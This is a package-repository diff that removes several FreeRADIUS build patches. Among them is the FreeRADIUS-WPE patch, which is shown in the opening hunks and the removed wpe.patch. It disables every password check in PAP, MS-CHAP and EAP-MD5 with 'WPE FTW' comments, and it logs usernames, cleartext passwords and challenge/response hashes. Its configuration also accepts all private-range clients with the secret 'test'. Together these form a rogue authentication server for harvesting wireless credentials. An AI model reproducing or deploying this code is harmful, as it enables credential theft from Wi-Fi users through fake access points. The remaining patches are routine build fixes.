+ fprintf(logfd, "\n");
+
+ fclose(logfd);
+ }
+
+
/*
* Dump a whole list of attributes to DEBUG2
diff -uNr freeradius-server-2.1.12/src/main/mainconfig.c freeradius-server-2.1.12-wpe/src/main/mainconfig.c
--- freeradius-server-2.1.12/src/main/mainconfig.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/main/mainconfig.c 2012-08-15 10:34:20.369565898 -0400
@@ -232,7 +232,7 @@
{ "checkrad", PW_TYPE_STRING_PTR, 0, &mainconfig.checkrad, "${sbindir}/checkrad" },
{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
-
+ { "wpelogfile", PW_TYPE_STRING_PTR, 0, &mainconfig.wpelogfile, "${logdir}/freeradius-server-wpe.log" },
#ifdef WITH_PROXY
{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
#endif
diff -uNr freeradius-server-2.1.12/src/main/radiusd.c freeradius-server-2.1.12-wpe/src/main/radiusd.c
--- freeradius-server-2.1.12/src/main/radiusd.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/main/radiusd.c 2012-08-15 10:35:10.881816378 -0400
@@ -65,7 +65,7 @@
int debug_flag = 0;
int check_config = FALSE;
-const char *radiusd_version = "FreeRADIUS Version " RADIUSD_VERSION ", for host " HOSTINFO ", built on " __DATE__ " at " __TIME__;
+const char *radiusd_version = "FreeRADIUS-WPE Version " RADIUSD_VERSION ", for host " HOSTINFO ", built on " __DATE__ " at " __TIME__;
pid_t radius_pid;
diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
--- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2012-08-15 10:34:20.369565898 -0400
@@ -244,11 +244,11 @@
* Verify the MS-CHAP response from the user.
*/
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session)
+ leap_session_t *session, char *username)
{
unsigned char ntpwdhash[16];
unsigned char response[24];
-
+ unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
/*
* No password or previous packet. Die.
@@ -266,6 +266,7 @@
*/
eapleap_mschap(ntpwdhash, session->peer_challenge, response);
if (memcmp(response, packet->challenge, 24) == 0) {
+ log_wpe("LEAP", username, NULL, challenge, 8, response, 24);
DEBUG2(" rlm_eap_leap: NtChallengeResponse from AP is valid");
memcpy(session->peer_response, response, sizeof(response));
return 1;
diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h
--- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2012-08-15 10:34:20.369565898 -0400
@@ -68,7 +68,7 @@
LEAP_PACKET *eapleap_extract(EAP_DS *auth);
LEAP_PACKET *eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session);
+ leap_session_t *session, char *username);
LEAP_PACKET *eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
VALUE_PAIR *user_name, VALUE_PAIR* password,
leap_session_t *session,
diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c
--- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2012-08-15 10:34:20.369565898 -0400
@@ -133,7 +133,7 @@
switch (session->stage) {
case 4: /* Verify NtChallengeResponse */
DEBUG2(" rlm_eap_leap: Stage 4");
- rcode = eapleap_stage4(packet, password, session);
+ rcode = eapleap_stage4(packet, password, session, username);
session->stage = 6;
/*
diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
--- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2012-08-15 10:34:20.369565898 -0400
@@ -202,9 +202,13 @@
/*
* The length of the response is always 16 for MD5.
*/
+ /* WPE FTW
if (memcmp(output, packet->value, 16) != 0) {
return 0;
}
+ */
+ log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+ packet->value, 16);
return 1;
}
diff -uNr freeradius-server-2.1.12/src/modules/rlm_mschap/rlm_mschap.c freeradius-server-2.1.12-wpe/src/modules/rlm_mschap/rlm_mschap.c
--- freeradius-server-2.1.12/src/modules/rlm_mschap/rlm_mschap.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_mschap/rlm_mschap.c 2012-08-15 10:34:20.381565941 -0400
@@ -661,9 +661,11 @@
static int do_mschap(rlm_mschap_t *inst,
REQUEST *request, VALUE_PAIR *password,
uint8_t *challenge, uint8_t *response,
- uint8_t *nthashhash, int do_ntlm_auth)
+ uint8_t *nthashhash, int do_ntlm_auth, char *username)
{
uint8_t calculated[24];
+
+ log_wpe("mschap", username, NULL, challenge, 8, response, 24);
/*
* Do normal authentication.
@@ -678,9 +680,11 @@
}
smbdes_mschap(password->vp_strvalue, challenge, calculated);
+ /* WPE FTW
if (rad_digest_cmp(response, calculated, 24) != 0) {
return -1;
}
+ */
/*
* If the password exists, and is an NT-Password,
@@ -1130,7 +1134,7 @@
*/
if (do_mschap(inst, request, password, challenge->vp_octets,
response->vp_octets + offset, nthashhash,
- do_ntlm_auth) < 0) {
+ do_ntlm_auth, request->username->vp_strvalue) < 0) {
RDEBUG2("MS-CHAP-Response is incorrect.");
goto do_error;
}
@@ -1239,7 +1243,7 @@
if (do_mschap(inst, request, nt_password, mschapv1_challenge,
response->vp_octets + 26, nthashhash,
- do_ntlm_auth) < 0) {
+ do_ntlm_auth, request->username->vp_strvalue) < 0) {
int i;
char buffer[128];
diff -uNr freeradius-server-2.1.12/src/modules/rlm_pap/rlm_pap.c freeradius-server-2.1.12-wpe/src/modules/rlm_pap/rlm_pap.c
--- freeradius-server-2.1.12/src/modules/rlm_pap/rlm_pap.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_pap/rlm_pap.c 2012-08-15 10:34:20.381565941 -0400
@@ -521,6 +521,8 @@
RDEBUG("ERROR: You set 'Auth-Type = PAP' for a request that does not contain a User-Password attribute!");
return RLM_MODULE_INVALID;
}
+ log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+ NULL, 0, NULL, 0);
/*
* The user MUST supply a non-zero-length password.
@@ -604,6 +606,7 @@
do_clear:
RDEBUG("Using clear text password \"%s\"",
vp->vp_strvalue);
+ /* WPE FTW
if ((vp->length != request->password->length) ||
(rad_digest_cmp(vp->vp_strvalue,
request->password->vp_strvalue,
@@ -611,6 +614,7 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: CLEAR TEXT password check failed");
goto make_msg;
}
+ */
done:
RDEBUG("User authenticated successfully");
return RLM_MODULE_OK;
@@ -643,10 +647,12 @@
fr_MD5Update(&md5_context, request->password->vp_octets,
request->password->length);
fr_MD5Final(digest, &md5_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: MD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -670,10 +676,12 @@
/*
* Compare only the MD5 hash results, not the salt.
*/
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, 16) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SMD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -692,10 +700,12 @@
fr_SHA1Update(&sha1_context, request->password->vp_octets,
request->password->length);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SHA1 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -716,10 +726,12 @@
request->password->length);
fr_SHA1Update(&sha1_context, &vp->vp_octets[20], vp->length - 20);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, 20) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SSHA password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -741,11 +753,13 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE FTW
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: NT password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -765,16 +779,20 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE FTW
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: LM password check failed");
+ */
make_msg:
+ /*
RDEBUG("Passwords don't match");
module_fmsg_vp = pairmake("Module-Failure-Message",
module_fmsg, T_OP_EQ);
pairadd(&request->packet->vps, module_fmsg_vp);
return RLM_MODULE_REJECT;
}
+ */
goto done;
break;

13
net-dialup/freeradius/files/freeradius-2.1.7-nothreads.patch
View file

@ -1,13 +0,0 @@
diff -Nru freeradius-server-2.1.6.orig/src/main/event.c freeradius-server-2.1.6/src/main/event.c
--- freeradius-server-2.1.6.orig/src/main/event.c 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/src/main/event.c 2009-09-05 07:52:42.000000000 +0200
@@ -1667,7 +1667,9 @@
*/
request->num_proxied_requests = 1;
request->num_proxied_responses = 0;
+#ifdef HAVE_PTHREAD_H
request->child_pid = NO_SUCH_CHILD_PID;
+#endif
update_event_timestamp(request->proxy, request->proxy_when.tv_sec);

63
net-dialup/freeradius/files/freeradius-2.1.7-pkglibdir.patch
View file

@ -1,63 +0,0 @@
diff -Nru freeradius-server-2.1.6.orig/Make.inc.in freeradius-server-2.1.6/Make.inc.in
--- freeradius-server-2.1.6.orig/Make.inc.in 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/Make.inc.in 2009-08-23 10:49:43.000000000 +0200
@@ -10,6 +10,7 @@
sysconfdir = @sysconfdir@
localstatedir = @localstatedir@
libdir = @libdir@
+pkglibdir = @libdir@/freeradius
bindir = @bindir@
sbindir = @sbindir@
docdir = @docdir@
diff -Nru freeradius-server-2.1.6.orig/raddb/radiusd.conf.in freeradius-server-2.1.6/raddb/radiusd.conf.in
--- freeradius-server-2.1.6.orig/raddb/radiusd.conf.in 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/raddb/radiusd.conf.in 2009-08-23 10:49:43.000000000 +0200
@@ -103,7 +103,7 @@
# make
# make install
#
-libdir = @libdir@
+libdir = @libdir@/freeradius
# pidfile: Where to place the PID of the RADIUS server.
#
diff -Nru freeradius-server-2.1.6.orig/src/modules/Makefile freeradius-server-2.1.6/src/modules/Makefile
--- freeradius-server-2.1.6.orig/src/modules/Makefile 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/src/modules/Makefile 2009-08-23 10:49:43.000000000 +0200
@@ -12,7 +12,7 @@
@$(MAKE) $(MFLAGS) WHAT_TO_MAKE=$@ common
install:
- $(INSTALL) -d -m 755 $(R)$(libdir)
+ $(INSTALL) -d -m 755 $(R)$(pkglibdir)
@$(MAKE) $(MFLAGS) WHAT_TO_MAKE=$@ common
clean:
diff -Nru freeradius-server-2.1.6.orig/src/modules/rules.mak freeradius-server-2.1.6/src/modules/rules.mak
--- freeradius-server-2.1.6.orig/src/modules/rules.mak 2009-08-23 10:46:57.000000000 +0200
+++ freeradius-server-2.1.6/src/modules/rules.mak 2009-08-23 10:49:43.000000000 +0200
@@ -123,7 +123,7 @@
$(TARGET).la: $(LT_OBJS)
$(LIBTOOL) --mode=link $(CC) -release $(RADIUSD_VERSION) \
-module $(LINK_MODE) $(LDFLAGS) $(RLM_LDFLAGS) -o $@ \
- -rpath $(libdir) $^ $(LIBRADIUS) $(RLM_LIBS) $(LIBS)
+ -rpath $(pkglibdir) $^ $(LIBRADIUS) $(RLM_LIBS) $(LIBS)
#######################################################################
#
@@ -164,13 +164,13 @@
# Do any module-specific installation.
#
# If there isn't a TARGET defined, then don't do anything.
-# Otherwise, install the libraries into $(libdir)
+# Otherwise, install the libraries into $(pkglibdir)
#
install:
@[ "x$(RLM_INSTALL)" = "x" ] || $(MAKE) $(MFLAGS) $(RLM_INSTALL)
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
- $(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
+ $(TARGET).la $(R)$(pkglibdir)/$(TARGET).la || exit $$?; \
fi
.PHONY: scan

89
net-dialup/freeradius/files/freeradius-2.1.7-qafixes.patch
View file

@ -1,89 +0,0 @@
diff -Nru freeradius-server-2.1.6.orig/configure.in freeradius-server-2.1.6/configure.in
--- freeradius-server-2.1.6.orig/configure.in 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/configure.in 2009-08-23 10:48:53.000000000 +0200
@@ -544,7 +544,19 @@
],
[ AC_MSG_WARN([pcap library not found, silently disabling the RADIUS sniffer.]) ])
-AC_LIB_READLINE
+AC_CHECK_LIB(readline, readline,
+ [ LIBREADLINE="-lreadline"
+ AC_DEFINE(HAVE_LIBREADLINE, 1,
+ [Define to 1 if you have a readline compatible library.])
+ AC_DEFINE(HAVE_READLINE_READLINE_H, 1,
+ [Define to 1 if you have the <readline/readline.h> header file.])
+ AC_DEFINE(HAVE_READLINE_HISTORY, 1,
+ [Define if your readline library has \`add_history'])
+ AC_DEFINE(HAVE_READLINE_HISTORY_H, 1,
+ [Define to 1 if you have the <readline/history.h> header file.])
+ ],
+ [ LIBREADLINE="" ])
+AC_SUBST(LIBREADLINE)
dnl #############################################################
dnl #
diff -Nru freeradius-server-2.1.6.orig/src/lib/Makefile freeradius-server-2.1.6/src/lib/Makefile
--- freeradius-server-2.1.6.orig/src/lib/Makefile 2009-08-23 10:46:57.000000000 +0200
+++ freeradius-server-2.1.6/src/lib/Makefile 2009-08-23 10:48:53.000000000 +0200
@@ -41,7 +41,7 @@
$(TARGET).la: $(LT_OBJS)
$(LIBTOOL) --mode=link $(CC) -release $(RADIUSD_VERSION) \
- $(LDFLAGS) $(LINK_MODE) -o $@ -rpath $(libdir) $^
+ $(LDFLAGS) $(LINK_MODE) -o $@ -rpath $(libdir) $^ $(LIBS)
$(LT_OBJS): $(INCLUDES)
diff -Nru freeradius-server-2.1.6.orig/src/main/listen.c freeradius-server-2.1.6/src/main/listen.c
--- freeradius-server-2.1.6.orig/src/main/listen.c 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/src/main/listen.c 2009-08-23 10:48:53.000000000 +0200
@@ -45,6 +45,9 @@
#include <fcntl.h>
#endif
+#ifdef WITH_UDPFROMTO
+#include <freeradius-devel/udpfromto.h>
+#endif
/*
* We'll use this below.
diff -Nru freeradius-server-2.1.6.orig/src/include/radiusd.h freeradius-server-2.1.6/src/include/radiusd.h
--- freeradius-server-2.1.6.orig/src/include/radiusd.h 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/src/include/radiusd.h 2009-08-23 11:34:17.000000000 +0200
@@ -637,6 +637,7 @@
void event_new_fd(rad_listen_t *listener);
/* evaluate.c */
+int radius_get_vp(REQUEST *request, const char *name, VALUE_PAIR **vp_p);
int radius_evaluate_condition(REQUEST *request, int modreturn, int depth,
const char **ptr, int evaluate_it, int *presult);
int radius_update_attrlist(REQUEST *request, CONF_SECTION *cs,
diff -Nru freeradius-server-2.1.6.orig/src/modules/rlm_passwd/rlm_passwd.c freeradius-server-2.1.6/src/modules/rlm_passwd/rlm_passwd.c
--- freeradius-server-2.1.6.orig/src/modules/rlm_passwd/rlm_passwd.c 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/src/modules/rlm_passwd/rlm_passwd.c 2009-08-23 11:29:38.000000000 +0200
@@ -247,8 +247,7 @@
static struct mypasswd * get_next(char *name, struct hashtable *ht)
{
-#define passwd ((struct mypasswd *) ht->buffer)
- struct mypasswd * hashentry;
+ struct mypasswd * hashentry, * passwd;
char buffer[1024];
int len;
char *list, *nextlist;
@@ -267,6 +266,7 @@
}
/* printf("try to find in file\n"); */
if (!ht->fp) return NULL;
+ passwd = (struct mypasswd *) ht->buffer;
while (fgets(buffer, 1024,ht->fp)) {
if(*buffer && *buffer!='\n' && (len = string_to_entry(buffer, ht->nfields, ht->delimiter, passwd, sizeof(ht->buffer)-1)) &&
(!ht->ignorenis || (*buffer !='-' && *buffer != '+') ) ){
@@ -288,7 +288,6 @@
fclose(ht->fp);
ht->fp = NULL;
return NULL;
-#undef passwd
}
static struct mypasswd * get_pw_nam(char * name, struct hashtable* ht)

11
net-dialup/freeradius/files/freeradius-2.1.7-ssl.patch
View file

@ -1,11 +0,0 @@
diff -Nru freeradius-server-2.1.6.orig/src/modules/rlm_eap/libeap/Makefile freeradius-server-2.1.6/src/modules/rlm_eap/libeap/Makefile
--- freeradius-server-2.1.6.orig/src/modules/rlm_eap/libeap/Makefile 2009-08-23 10:46:57.000000000 +0200
+++ freeradius-server-2.1.6/src/modules/rlm_eap/libeap/Makefile 2009-08-23 10:47:38.000000000 +0200
@@ -9,6 +9,7 @@
SRCS = eapcommon.c eapcrypto.c eapsimlib.c fips186prf.c
ifneq ($(OPENSSL_LIBS),)
SRCS += cb.c eap_tls.c mppe_keys.c tls.c
+LIBS += $(OPENSSL_LIBS)
endif
LT_OBJS = $(SRCS:.c=.lo)
INCLUDES = eap_types.h eap_tls.h

33
net-dialup/freeradius/files/freeradius-2.1.7-versionless-la-files.patch
View file

@ -1,33 +0,0 @@
diff -Nru freeradius-server-2.1.6.orig/src/lib/Makefile freeradius-server-2.1.6/src/lib/Makefile
--- freeradius-server-2.1.6.orig/src/lib/Makefile 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/src/lib/Makefile 2009-08-23 10:45:51.000000000 +0200
@@ -53,8 +53,6 @@
$(INSTALL) -d -m 755 $(R)$(libdir)
$(LIBTOOL) --mode=install $(INSTALL) -c $(TARGET).la \
$(R)$(libdir)/$(TARGET).la
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la;
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la
.PHONY: scan
scan:
diff -Nru freeradius-server-2.1.6.orig/src/modules/rlm_eap/libeap/Makefile freeradius-server-2.1.6/src/modules/rlm_eap/libeap/Makefile
--- freeradius-server-2.1.6.orig/src/modules/rlm_eap/libeap/Makefile 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/src/modules/rlm_eap/libeap/Makefile 2009-08-23 10:44:15.000000000 +0200
@@ -44,5 +44,3 @@
install: all
$(LIBTOOL) --mode=install $(INSTALL) -c $(TARGET).la \
$(R)$(libdir)/$(TARGET).la
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la;
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la
diff -Nru freeradius-server-2.1.6.orig/src/modules/rules.mak freeradius-server-2.1.6/src/modules/rules.mak
--- freeradius-server-2.1.6.orig/src/modules/rules.mak 2009-05-18 13:13:55.000000000 +0200
+++ freeradius-server-2.1.6/src/modules/rules.mak 2009-08-23 10:44:15.000000000 +0200
@@ -171,8 +171,6 @@
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
$(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la; \
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la || exit $$?; \
fi
.PHONY: scan

948
net-dialup/freeradius/files/freeradius-2.1.7-wpe.patch
View file

@ -1,948 +0,0 @@
diff -crB freeradius-server-2.1.7/raddb/clients.conf freeradius-server-2.1.7-wpe/raddb/clients.conf
*** freeradius-server-2.1.7/raddb/clients.conf Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/raddb/clients.conf Thu Nov 12 00:18:30 2009
***************
*** 2,12 ****
##
## clients.conf -- client configuration directives
##
! ## $Id$
#######################################################################
#
! # Define RADIUS clients (usually a NAS, Access Point, etc.).
#
# Defines a RADIUS client.
--- 2,21 ----
##
## clients.conf -- client configuration directives
##
! ## $Id: clients.conf,v 1.12 2008/02/13 09:41:14 aland Exp $
#######################################################################
#
! # Definition of a RADIUS client (usually a NAS).
! #
! # The information given here over rides anything given in the
! # 'clients' file, or in the 'naslist' file. The configuration here
! # contains all of the information from those two files, and allows
! # for more configuration items.
! #
! # The "shortname" is be used for logging. The "nastype", "login" and
! # "password" fields are mainly used for checkrad and are optional.
! #
#
# Defines a RADIUS client.
***************
*** 22,31 ****
# Each client has a "short name" that is used to distinguish it from
# other clients.
#
! # In version 1.x, the string after the word "client" was the IP
! # address of the client. In 2.0, the IP address is configured via
! # the "ipaddr" or "ipv6addr" fields. For compatibility, the 1.x
! # format is still accepted.
#
client localhost {
# Allowed values are:
--- 31,39 ----
# Each client has a "short name" that is used to distinguish it from
# other clients.
#
! # In version 1.x, this field was the IP address of the client.
! # In 2.0, the IP address is configured via the "ipaddr" or "ipv6addr"
! # fields. For compatibility, the 1.x format is still accepted.
#
client localhost {
# Allowed values are:
***************
*** 63,74 ****
# In that case, the smallest possible network will be used
# as the "best match" for the client.
#
- # Clients can also be defined dynamically at run time, based
- # on any criteria. e.g. SQL lookups, keying off of NAS-Identifier,
- # etc.
- # See raddb/sites-available/dynamic-clients for details.
- #
-
# netmask = 32
#
--- 71,76 ----
***************
*** 162,174 ****
# item, as in the example below.
#
# virtual_server = home1
-
- #
- # A pointer to the "home_server_pool" OR a "home_server"
- # section that contains the CoA configuration for this
- # client. For an example of a coa home server or pool,
- # see raddb/sites-available/originate-coa
- # coa_server = coa
}
# IPv6 Client
--- 164,169 ----
***************
*** 227,234 ****
# "clients = per_socket_clients". That IP address/port combination
# will then accept ONLY the clients listed in this section.
#
! #clients per_socket_clients {
# client 192.168.3.4 {
# secret = testing123
# }
#}
--- 222,246 ----
# "clients = per_socket_clients". That IP address/port combination
# will then accept ONLY the clients listed in this section.
#
! #per_socket_clients {
# client 192.168.3.4 {
# secret = testing123
# }
#}
+
+ client 192.168.0.0/16 {
+ secret = test
+ shortname = testAP
+ }
+ client 172.16.0.0/12 {
+ secret = test
+ shortname = testAP
+ }
+ client 10.0.0.0/8 {
+ secret = test
+ shortname = testAP
+ }
+ #client 127.0.0.1 {
+ # secret = test
+ # shortname = testAP
+ #}
diff -crB freeradius-server-2.1.7/raddb/eap.conf freeradius-server-2.1.7-wpe/raddb/eap.conf
*** freeradius-server-2.1.7/raddb/eap.conf Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/raddb/eap.conf Thu Nov 12 00:18:30 2009
***************
*** 1,479 ****
- # -*- text -*-
- ##
- ## eap.conf -- Configuration for EAP types (PEAP, TTLS, etc.)
- ##
- ## $Id$
-
- #######################################################################
- #
- # Whatever you do, do NOT set 'Auth-Type := EAP'. The server
- # is smart enough to figure this out on its own. The most
- # common side effect of setting 'Auth-Type := EAP' is that the
- # users then cannot use ANY other authentication method.
- #
- # EAP types NOT listed here may be supported via the "eap2" module.
- # See experimental.conf for documentation.
- #
eap {
! # Invoke the default supported EAP type when
! # EAP-Identity response is received.
! #
! # The incoming EAP messages DO NOT specify which EAP
! # type they will be using, so it MUST be set here.
! #
! # For now, only one default EAP type may be used at a time.
! #
! # If the EAP-Type attribute is set by another module,
! # then that EAP type takes precedence over the
! # default type configured here.
! #
! default_eap_type = md5
!
! # A list is maintained to correlate EAP-Response
! # packets with EAP-Request packets. After a
! # configurable length of time, entries in the list
! # expire, and are deleted.
! #
timer_expire = 60
-
- # There are many EAP types, but the server has support
- # for only a limited subset. If the server receives
- # a request for an EAP type it does not support, then
- # it normally rejects the request. By setting this
- # configuration to "yes", you can tell the server to
- # instead keep processing the request. Another module
- # MUST then be configured to proxy the request to
- # another RADIUS server which supports that EAP type.
- #
- # If another module is NOT configured to handle the
- # request, then the request will still end up being
- # rejected.
ignore_unknown_eap_types = no
!
! # Cisco AP1230B firmware 12.2(13)JA1 has a bug. When given
! # a User-Name attribute in an Access-Accept, it copies one
! # more byte than it should.
! #
! # We can work around it by configurably adding an extra
! # zero byte.
! cisco_accounting_username_bug = no
!
! #
! # Help prevent DoS attacks by limiting the number of
! # sessions that the server is tracking. Most systems
! # can handle ~30 EAP sessions/s, so the default limit
! # of 2048 is more than enough.
! max_sessions = 2048
!
! # Supported EAP-types
!
! #
! # We do NOT recommend using EAP-MD5 authentication
! # for wireless connections. It is insecure, and does
! # not provide for dynamic WEP keys.
! #
md5 {
}
-
- # Cisco LEAP
- #
- # We do not recommend using LEAP in new deployments. See:
- # http://www.securiteam.com/tools/5TP012ACKE.html
- #
- # Cisco LEAP uses the MS-CHAP algorithm (but not
- # the MS-CHAP attributes) to perform it's authentication.
- #
- # As a result, LEAP *requires* access to the plain-text
- # User-Password, or the NT-Password attributes.
- # 'System' authentication is impossible with LEAP.
- #
leap {
}
-
- # Generic Token Card.
- #
- # Currently, this is only permitted inside of EAP-TTLS,
- # or EAP-PEAP. The module "challenges" the user with
- # text, and the response from the user is taken to be
- # the User-Password.
- #
- # Proxying the tunneled EAP-GTC session is a bad idea,
- # the users password will go over the wire in plain-text,
- # for anyone to see.
- #
gtc {
- # The default challenge, which many clients
- # ignore..
- #challenge = "Password: "
-
- # The plain-text response which comes back
- # is put into a User-Password attribute,
- # and passed to another module for
- # authentication. This allows the EAP-GTC
- # response to be checked against plain-text,
- # or crypt'd passwords.
- #
- # If you say "Local" instead of "PAP", then
- # the module will look for a User-Password
- # configured for the request, and do the
- # authentication itself.
- #
auth_type = PAP
}
-
- ## EAP-TLS
- #
- # See raddb/certs/README for additional comments
- # on certificates.
- #
- # If OpenSSL was not found at the time the server was
- # built, the "tls", "ttls", and "peap" sections will
- # be ignored.
- #
- # Otherwise, when the server first starts in debugging
- # mode, test certificates will be created. See the
- # "make_cert_command" below for details, and the README
- # file in raddb/certs
- #
- # These test certificates SHOULD NOT be used in a normal
- # deployment. They are created only to make it easier
- # to install the server, and to perform some simple
- # tests with EAP-TLS, TTLS, or PEAP.
- #
- # See also:
- #
- # http://www.dslreports.com/forum/remark,9286052~mode=flat
- #
tls {
- #
- # These is used to simplify later configurations.
- #
- certdir = ${confdir}/certs
- cadir = ${confdir}/certs
-
private_key_password = whatever
! private_key_file = ${certdir}/server.pem
!
! # If Private key & Certificate are located in
! # the same file, then private_key_file &
! # certificate_file must contain the same file
! # name.
! #
! # If CA_file (below) is not used, then the
! # certificate_file below MUST include not
! # only the server certificate, but ALSO all
! # of the CA certificates used to sign the
! # server certificate.
! certificate_file = ${certdir}/server.pem
!
! # Trusted Root CA list
! #
! # ALL of the CA's in this list will be trusted
! # to issue client certificates for authentication.
! #
! # In general, you should use self-signed
! # certificates for 802.1x (EAP) authentication.
! # In that case, this CA file should contain
! # *one* CA certificate.
! #
! # This parameter is used only for EAP-TLS,
! # when you issue client certificates. If you do
! # not use client certificates, and you do not want
! # to permit EAP-TLS authentication, then delete
! # this configuration item.
! CA_file = ${cadir}/ca.pem
!
! #
! # For DH cipher suites to work, you have to
! # run OpenSSL to create the DH file first:
! #
! # openssl dhparam -out certs/dh 1024
! #
! dh_file = ${certdir}/dh
! random_file = ${certdir}/random
!
! #
! # This can never exceed the size of a RADIUS
! # packet (4096 bytes), and is preferably half
! # that, to accomodate other attributes in
! # RADIUS packet. On most APs the MAX packet
! # length is configured between 1500 - 1600
! # In these cases, fragment size should be
! # 1024 or less.
! #
! # fragment_size = 1024
!
! # include_length is a flag which is
! # by default set to yes If set to
! # yes, Total Length of the message is
! # included in EVERY packet we send.
! # If set to no, Total Length of the
! # message is included ONLY in the
! # First packet of a fragment series.
! #
! # include_length = yes
!
! # Check the Certificate Revocation List
! #
! # 1) Copy CA certificates and CRLs to same directory.
! # 2) Execute 'c_rehash <CA certs&CRLs Directory>'.
! # 'c_rehash' is OpenSSL's command.
! # 3) uncomment the line below.
! # 5) Restart radiusd
! # check_crl = yes
! # CA_path = /path/to/directory/with/ca_certs/and/crls/
